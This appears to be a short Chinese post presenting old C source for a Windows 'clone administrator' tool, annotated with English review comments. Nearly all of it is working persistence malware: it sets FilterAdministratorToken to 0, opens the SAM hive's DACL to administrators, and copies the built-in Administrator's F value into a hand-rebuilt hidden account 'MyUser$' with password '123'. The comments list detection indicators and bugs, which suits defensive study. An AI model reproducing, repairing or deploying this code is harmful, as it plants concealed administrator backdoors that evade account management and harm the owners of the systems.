克隆管理员代码


        翻看了N年前的代码,看到了这个。

#include <stdio.h>
#include <aclapi.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib, "netapi32.lib")

/*
 * "Clone administrator" -- an old Windows hidden-account persistence tool.
 *
 * What the code below does, in the order main() runs it:
 *   1. SetFilterFalse : writes FilterAdministratorToken = 0 under
 *                       HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system.
 *   2. CloneAdmin     : creates a local user, grants "administrators" GENERIC_ALL
 *                       on HKLM\SAM\SAM, reads the "F" value of RID 0x1F4 (500)
 *                       and the new user's "V" value straight out of the SAM hive,
 *                       deletes the user via the Net API, then re-creates its
 *                       SAM keys by hand with the copied data.
 *
 * Reviewer notes (security): this is the classic SAM "F/V copy" technique for
 * planting an account that survives / hides from normal account management.
 * It needs an elevated caller (direct SAM access normally needs SYSTEM) and
 * writes the SAM hive directly. Detection indicators that follow from the code:
 *   - FilterAdministratorToken == 0 in the policies\system key
 *   - a non-default DACL on HKLM\SAM\SAM granting "administrators" GENERIC_ALL
 *   - a local account whose name ends in '$' (here "MyUser$", password "123")
 *   - two SAM user keys under Domains\Account\Users with an identical "F" value
 * As written, SetAttribute() always returns 0, so CloneAdmin returns FALSE
 * right after AddUser -- the weak-password account and the UAC policy change
 * are still left behind on that path.
 *
 * The listing was pasted with its line breaks collapsed; they are restored here,
 * the code itself is unchanged.
 */

/* One raw registry value read from the SAM hive: caller-owned buffer + length.
 * KeyLen is passed to RegQueryValueEx by address, so it is an in/out size. */
typedef struct _KeyValue{
    PBYTE value;
    DWORD KeyLen;
}KeyValue, *PKeyValue;

/* Everything this tool moves between SAM user keys. */
typedef struct _UserRegVal{
    DWORD UserNum; // RID of the account; recovered from the *type* of the Names\<user> default value
    KeyValue F;  // "F" value; CloneAdmin allocates 0x100 bytes
    KeyValue V;  // "V" value; CloneAdmin allocates 0x400 bytes
}UserRegVal, *PUserRegVal;

/*
 * Create a local account via the Net API (NetUserAdd, info level 1).
 *
 * UserName / Passwd : NUL-terminated wide strings handed to NetUserAdd.
 * Returns TRUE only on NERR_Success. The parameter-error index written to
 * dwError is discarded, so the caller gets no reason on failure.
 * Note: the account is created as a plain USER_PRIV_USER -- the "admin" part is
 * meant to come later from the SAM copy in CloneAdmin, not from this call.
 */
BOOL AddUser(PWCHAR UserName, PWCHAR Passwd){
    USER_INFO_1 ui;
    DWORD dwLevel = 1;
    DWORD dwError = 0;
    NET_API_STATUS nStatus;
    ui.usri1_name = UserName;
    ui.usri1_password = Passwd;
    ui.usri1_priv = USER_PRIV_USER;
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;
    ui.usri1_script_path = NULL;
    // add the user on the local machine (servername == NULL)
    nStatus = NetUserAdd(NULL,dwLevel,(LPBYTE)&ui,&dwError);
    // success
    if (nStatus == NERR_Success){
        return TRUE;
    }
    return FALSE;
}

/* Unused stub (decompiler-style parameter names). Always returns 0 and is not
 * called anywhere in this listing. */
DWORD WriteObjectSecurity(int a1, LPWSTR pObjectName, int a3, PSECURITY_DESCRIPTOR bOwnerDefaulted){
    return 0;
}

/*
 * Unused helper: strips the DACL from a registry key.
 *
 * SetNamedSecurityInfoW is called with pDacl == NULL while the DACL bit (0x4)
 * is set inside the 0xB0000004 magic; per the API documentation that installs
 * a NULL DACL, which grants everyone full access -- hence the name. The
 * remaining bits of 0xB0000004 appear to be the PROTECTED_DACL /
 * UNPROTECTED_DACL / UNPROTECTED_SACL flags (the first two contradict each
 * other). The return value is ignored. Not called anywhere in this listing.
 */
VOID SetEveryOne(PWCHAR key){
    SetNamedSecurityInfoW( key, SE_REGISTRY_KEY, 0xB0000004, NULL, NULL, NULL, NULL);
}

/*
 * Loosen the DACL on HKLM\SAM\SAM so that "administrators" get GENERIC_ALL on
 * it and, via CONTAINER_INHERIT_ACE|OBJECT_INHERIT_ACE, on every subkey.
 *
 * Security note: by default the SAM hive is not readable even by
 * administrators; this call persistently weakens that and is itself a strong
 * detection indicator (non-default DACL on HKLM\SAM\SAM). It needs WRITE_DAC on
 * the key, i.e. an elevated caller.
 *
 * Defects visible here (left as-is, see file header):
 *  - returns 0 unconditionally, so the real status in `result` is thrown away;
 *    CloneAdmin treats 0 as failure and stops right after this call.
 *  - GetNamedSecurityInfo's return is not checked, so pOldDACL may be
 *    uninitialized when passed to SetEntriesInAcl.
 *  - SUB_CONTAINERS_AND_OBJECTS_INHERIT is an inheritance flag OR'd into the
 *    access mask; the inheritance is already requested by the last argument.
 *  - pSecDesc and pNewDACL are never LocalFree'd.
 */
DWORD SetAttribute(){
    DWORD result;
    PSECURITY_DESCRIPTOR pSecDesc;
    PACL pOldDACL, pNewDACL;
    EXPLICIT_ACCESS ea;
    GetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"), SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,NULL,NULL,&pOldDACL,NULL,&pSecDesc);
    BuildExplicitAccessWithName(&ea, TEXT("administrators"),
        READ_CONTROL|WRITE_DAC|GENERIC_ALL|SUB_CONTAINERS_AND_OBJECTS_INHERIT,  // FILE_READ_DATA|FILE_LIST_DIRECTORY|FILE_READ_ATTRIBUTES|FILE_READ_EA,
        SET_ACCESS, CONTAINER_INHERIT_ACE|OBJECT_INHERIT_ACE);
    result = SetEntriesInAcl(1, &ea, pOldDACL, &pNewDACL);
    if (result == ERROR_SUCCESS){
        result = SetNamedSecurityInfo(TEXT("MACHINE\\SAM\\SAM\\"),SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL);
    }
    return 0;
}

/*
 * Pull the raw SAM data needed for the clone.
 *
 *  1. Reads the "F" value of HKLM\SAM\SAM\Domains\Account\Users\000001F4
 *     (RID 0x1F4 = 500, the built-in Administrator) into UserReg->F.
 *  2. Opens ...\Users\Names\<UserName> and enumerates its first value: the
 *     account's RID is encoded as the *type* of that value, which is why
 *     `Type` is stored into UserReg->UserNum and then formatted as %08X.
 *  3. Reads that account's own "V" value into UserReg->V.
 *
 * The caller supplies the value buffers and their KeyLen; RegQueryValueEx
 * updates KeyLen to the bytes written (a value larger than the buffer fails
 * with ERROR_MORE_DATA and yields FALSE). Returns TRUE only if all three reads
 * succeeded. Opening SAM keys directly needs SYSTEM, or the ACL change made by
 * SetAttribute.
 *
 * Review notes: wsprintfW into a MAX_PATH buffer is unbounded in UserName
 * (fine for the literal used by main, not for arbitrary input); `KeyValue` is
 * an unused local; on the RegEnumValue failure path the Names key handle is
 * never closed.
 */
BOOL ReadUserReg(PWCHAR UserName, PUserRegVal UserReg){
    HKEY hKey;
    BOOL ntStatus = TRUE;
    DWORD KeyValue = 0;
    DWORD Type;
    PWCHAR buf = new WCHAR[MAX_PATH];
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);
    // read admin F key (RID 500)
    long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
        TEXT("SAM\\SAM\\Domains\\Account\\Users\\000001F4"), 0, KEY_READ, &hKey);
    if (lRet == ERROR_SUCCESS){
        Type = REG_BINARY;
        if (RegQueryValueEx(hKey, TEXT("F"), 0,&Type,UserReg->F.value, &UserReg->F.KeyLen) != ERROR_SUCCESS ){
            ntStatus = FALSE;
        }
        RegCloseKey(hKey);
    }else{
        ntStatus = FALSE;
    }
    // read user V key: first resolve the RID through Names\<user>
    lRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);
    if (lRet == ERROR_SUCCESS){
        Type = REG_BINARY;
        PTCHAR lpName = new TCHAR[0x16];
        DWORD lpcbName = 0x16;
        PBYTE lpData = new BYTE[0x8];
        DWORD lpcbClass = 0x8;
        if ( RegEnumValue(hKey, 0, lpName,&lpcbName,NULL,&Type,lpData,&lpcbClass) == ERROR_SUCCESS ){
            UserReg->UserNum = Type;   // the value's type field carries the RID
            wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", Type);
            RegCloseKey(hKey);
            // reg read user V key
            lRet = RegOpenKeyExW(HKEY_LOCAL_MACHINE, buf, 0, KEY_READ, &hKey);
            if (lRet == ERROR_SUCCESS){
                Type = REG_BINARY;
                if (RegQueryValueEx(hKey, TEXT("V"), 0,&Type,UserReg->V.value, &UserReg->V.KeyLen) != ERROR_SUCCESS ){
                    ntStatus = FALSE;
                }
                RegCloseKey(hKey);
            }else{
                ntStatus = FALSE;
            }
        }else{
            ntStatus = FALSE;   // NOTE(review): hKey for Names\<user> is leaked on this path
        }
        delete []lpData;
        delete []lpName;
    }else{
        ntStatus = FALSE;
    }
    delete []buf;
    return ntStatus;
}

/*
 * Write the captured F/V data back into the SAM under the RID captured by
 * ReadUserReg, and re-create the Names\<UserName> key whose default value has
 * the RID as its *type* and no data (the mirror of what ReadUserReg decoded).
 *
 * Called after NetUserDel has removed the account, so this is a hand-built SAM
 * entry: the "V" value is the user's own, the "F" value is the one copied from
 * RID 500. Needs write access to HKLM\SAM\SAM (see SetAttribute).
 * Returns FALSE if either key could not be created; the RegSetValueEx results
 * are not checked. `buf` is never freed (leak).
 */
BOOL SetUserReg(PWCHAR UserName, PUserRegVal UserReg){
    PWCHAR buf = new WCHAR[MAX_PATH];
    HKEY hKey;
    BOOL ntStatus = TRUE; 
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\%08X", UserReg->UserNum);
    if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){
        RegSetValueEx(hKey, TEXT("V"), 0, REG_BINARY, UserReg->V.value, UserReg->V.KeyLen);
        RegSetValueEx(hKey, TEXT("F"), 0, REG_BINARY, UserReg->F.value, UserReg->F.KeyLen);
        RegCloseKey(hKey);
    }else{
        ntStatus = FALSE;
    }
    wsprintfW(buf, L"SAM\\SAM\\Domains\\Account\\Users\\Names\\%s", UserName);
    if( ERROR_SUCCESS == RegCreateKeyExW( HKEY_LOCAL_MACHINE,buf,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,0)){
        // default value: type = RID, zero bytes of data
        RegSetValueEx(hKey, NULL, 0, UserReg->UserNum, NULL, NULL);
        RegCloseKey(hKey);
    }else{
        ntStatus = FALSE;
    }
    return ntStatus;
}

/* Delete the local account through the Net API. Returns TRUE on NERR_Success. */
BOOL 
DelUser(PWCHAR UserName){
    NET_API_STATUS nStatus;
    // delete the user
    nStatus = NetUserDel(NULL, UserName);
    if (NERR_Success == nStatus){
        return TRUE;
    }
    return FALSE;
}

/*
 * The clone sequence: AddUser -> SetAttribute -> ReadUserReg -> DelUser -> SetUserReg.
 *
 * Intended effect: an account that no longer exists as far as the Net API is
 * concerned (NetUserDel ran) but whose SAM keys were rebuilt with RID 500's
 * "F" data.
 *
 * Review notes, all visible in this function:
 *  - SetAttribute() always returns 0, so `!SetAttribute()` is true and this
 *    function returns FALSE right after AddUser. The account created by AddUser
 *    is NOT removed on that path (nor on the DelUser failure path).
 *  - ReadUserReg's return value is ignored: if any read fails, DelUser still
 *    runs and SetUserReg writes the uninitialized 0x400/0x100 heap buffers
 *    into the SAM.
 *  - The two `new BYTE[]` buffers are never deleted. The NULL checks only
 *    matter for a non-throwing `new`, and if they did trigger KeyLen would be
 *    left uninitialized.
 */
BOOL CloneAdmin(PWCHAR UserName, PWCHAR Passwd){
    // add user
    if (!AddUser(UserName, Passwd)){
        return FALSE;
    }
    // set Reg attrib (SAM DACL)
    if (!SetAttribute()){
        return FALSE;
    }
    // copy the admin permission: buffers for the raw F / V values
    UserRegVal value;
    value.V.value = new BYTE[0x400];
    if ( value.V.value != NULL ){
        value.V.KeyLen = 0x400;
    }
    value.F.value = new BYTE[0x100];
    if ( value.F.value != NULL ){
        value.F.KeyLen = 0x100;
    }
    ReadUserReg( UserName, &value);
    // delete user
    if (!DelUser(UserName)){
        return FALSE;
    }
    // set the Regedit permission: rebuild the SAM keys by hand
    SetUserReg(UserName, &value);
    return TRUE;
}

/*
 * Write FilterAdministratorToken = 0 (REG_DWORD) under
 * HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system.
 *
 * That value is the UAC policy "Admin Approval Mode for the built-in
 * Administrator account"; 0 turns the token filtering off (original comment:
 * "In Vista set the administrator not filter Token"). RegCreateKeyEx is used,
 * so the key is created if absent; writing it needs admin rights.
 * Returns FALSE if the key cannot be opened/created or the value cannot be set.
 * Security note: this value is normally GPO-managed; a 0 here is a
 * UAC-weakening / persistence indicator on its own, and main() persists it
 * even when the rest of the tool fails.
 */
BOOL SetFilterFalse(){
    HKEY hKey;
    BOOL ntStatus = TRUE;
    DWORD KeyValue = 0;
    long lRet = RegCreateKeyEx(HKEY_LOCAL_MACHINE,TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,NULL);
    if (lRet != ERROR_SUCCESS){
        return FALSE;
    }
    if (ERROR_SUCCESS != RegSetValueEx(hKey, TEXT("FilterAdministratorToken"), 0, REG_DWORD, (const unsigned char *) &KeyValue, 4) ){
        ntStatus = FALSE;
    }
    RegCloseKey(hKey);
    return ntStatus;
}

/*
 * Entry point. Hard-coded target: user "MyUser$" with password "123".
 * The trailing '$' is the old convention for keeping an account out of
 * `net user` listings. The message box text is Chinese for "hidden user set up
 * successfully". argc/argv are unused. SetFilterFalse's registry change is made
 * (and kept) before CloneAdmin runs, regardless of CloneAdmin's outcome.
 */
int main(int argc, char* argv[]){
    if ( SetFilterFalse() ){
        if ( CloneAdmin(L"MyUser$", L"123") ){
            MessageBox(NULL, TEXT("设置隐藏用户成功"), NULL, NULL);
        }
    }
    return 0;
}

